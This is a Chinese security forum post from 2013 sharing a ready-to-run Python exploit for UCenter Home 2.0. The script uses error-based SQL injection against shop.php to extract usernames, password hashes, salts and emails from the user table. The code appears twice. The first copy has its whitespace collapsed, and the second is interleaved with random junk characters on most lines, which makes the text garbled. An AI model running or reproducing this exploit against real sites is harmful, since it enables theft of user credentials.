找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2055|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
0 o7 t5 @8 }0 ?3 D+ _: T1 X  h
7 M5 E0 i  j8 D- F0 `- O+ v  i! z2 |; \4 I$ Y
#!/usr/bin/env python  
% }4 j! d; R) k- H. E' N ; @& X) i$ N: E$ \: q9 i7 B
import sys  
' N4 \8 l, a7 u! R1 D' R! Y( Eimport urllib2  $ p9 Y( e$ n/ U- N3 U
import re  
# R0 s* I7 x! u% \1 j - o# O3 \. r2 k, a% v; W6 X4 L* ~
def info():  3 m- S2 M' `; X9 A9 p  |
    print 'From:http://www.exploit-db.com/exploits/14997/'
; N" ^3 P. U6 g, E    print 'http://www.hake.cc/Web_loudong/' 6 k4 |6 X2 d  C1 ]
    print 'changed:qiaoy'  
7 w) L  N& s! M7 z7 X$ B- q0 p: w9 |    print 'exp:'  + Q, R1 R' k' _3 I& ~
    print ' ./UCenter_Home_2.0.py site'  & c# R' q7 }0 A

2 \. T3 j% N" y8 ]- n+ Rdef main():  0 I* _8 ]8 a$ v% U; k+ C7 X
    if len(sys.argv) != 2:  
& u! F" u- H; I) c/ R        info()  2 t/ `* f9 R, T  D! }6 e
    else:  + ^2 K" P& x2 m. V# z9 e4 V+ b
        site = sys.argv[1]  
1 G9 h) S( x! f8 i5 C        if site[0:7] == 'http://':  " U1 P: F% C) `0 k& M* t3 `! f! T
            sitesite =site  
$ C) R# L$ M( C: @        elif site[0:8] == 'https://':  
2 H- f6 z7 j# K" c4 S            sitesite = site  
& H0 s' x6 Q7 Z  t        else:  
$ P) N. K2 c; C- `8 l5 x( Q            site = 'http://'+site  % i* z; P7 a  l
        try:  
  G7 f; V4 x# v$ p% b% K9 h            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
$ B) F0 S' J( c4 M. l, M9 F! F0 y  E            Value = urllib2.urlopen(url).read()  
( Z( b9 N" ~+ V! S' G; j            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  ; Y9 S6 q- o/ k4 |$ T
            hacked = Msg.split(':')  6 T5 `& `+ U. e9 D. c
            print 'Name:    '+hacked[1]  
8 M7 y6 ^% G3 x5 ~0 _% o- y- _            print 'Passwd:  '+hacked[2]  1 b2 B) t  t6 Z( C) y0 t9 |! u
            print 'salt:    '+hacked[3]    {5 n8 Z. p0 D5 {" I2 T- c
            print 'email:   '+hacked[4]  : U+ V/ G/ i% L  ^, Q
        except:  ; Y' D4 ]( ]9 }) O$ I$ [. b: n
            print 'Sorry,I can\'t work............'  
& d2 ]* l% [9 a' s
$ J5 r+ i4 _* l* {1 d& X9 _' F- @if __name__ == '__main__':  
) ?: o2 q9 o! Q* u    main()
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表